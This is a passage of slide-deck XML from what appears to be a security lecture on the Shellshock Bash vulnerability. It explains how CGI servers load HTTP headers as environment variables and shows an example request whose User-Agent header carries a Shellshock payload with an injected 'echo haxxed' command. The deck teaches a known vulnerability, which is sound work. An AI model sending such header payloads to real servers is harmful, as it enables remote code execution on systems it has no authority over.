          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2158" name="Google Shape;2158;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7670300" y="3625475"/>
            <a:ext cx="1029600" cy="45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2159" name="Google Shape;2159;p115"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="679875" y="1711175"/>
            <a:ext cx="2099131" cy="20280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63"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2164" name="Google Shape;2164;p116"/>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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2165" name="Google Shape;2165;p116"/>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Shellshock is made possible due to a vulnerability in how servers parse HTTP requests. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2166" name="Google Shape;2166;p11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14</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2167" name="Google Shape;2167;p116"/>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168" name="Google Shape;2168;p116"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1445425"/>
            <a:ext cx="9144000" cy="3461100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>CGI (Common Gateway Interface) defines a standard that allows clients to run scripts on a server. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Typically, when requesting a page like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, the server will load the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> and sends it in a response. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>However, with CGI scripts, if a client requests a script capped such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>status.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>, the server will run the script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" err="1">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>status.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> and then send its output back in an HTTP response. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Sometimes, a server needs to use HTTP headers to run CGI scripts. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>For example: if the server is configured to send different responses for clients requesting HTML and clients requiring JSON, it may need to read the Accept header</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Servers that use CGI automatically load HTTP request headers as Bash environment variables. Then, when they run CGI scripts, the scripts can access the HTTP headers by reading the environment variables. </a:t>
            </a:r>
            <a:endParaRPr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72"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2173" name="Google Shape;2173;p117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="66747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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bash does not sanitize headers before loading them as environment variables, meaning it will load whatever value is sent in the header. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2174" name="Google Shape;2174;p117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1450750"/>
            <a:ext cx="6699600" cy="3692700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Host: example.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> User-Agent: () { :;};</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Connection: keep-alive</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>For this example, the request below results in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>HTTP_USER_AGENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> being set to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(){ :;};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This is cryptic syntax, but in vulnerable versions of Bash, it creates a function that does nothing. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2175" name="Google Shape;2175;p117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Creating a function means the server interprets the header as shellcode. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Since it doesn’t just read it as a string, it can execute arbitrary code on the target. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2176" name="Google Shape;2176;p117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Shellshock</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2177" name="Google Shape;2177;p11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15</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2178" name="Google Shape;2178;p117"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>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82"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2183" name="Google Shape;2183;p118"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="66747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sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bash does not sanitize headers before loading them as environment variables, meaning it will load whatever value is sent in the header. </a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2184" name="Google Shape;2184;p118"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1450750"/>
            <a:ext cx="6699600" cy="3692700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> GET /index.html HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Host: example.com</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> User-Agent: () { :;}; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>echo haxxed</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> Connection: keep-alive</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Shellshock is possible because Bash runs code after this no-op function definition. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
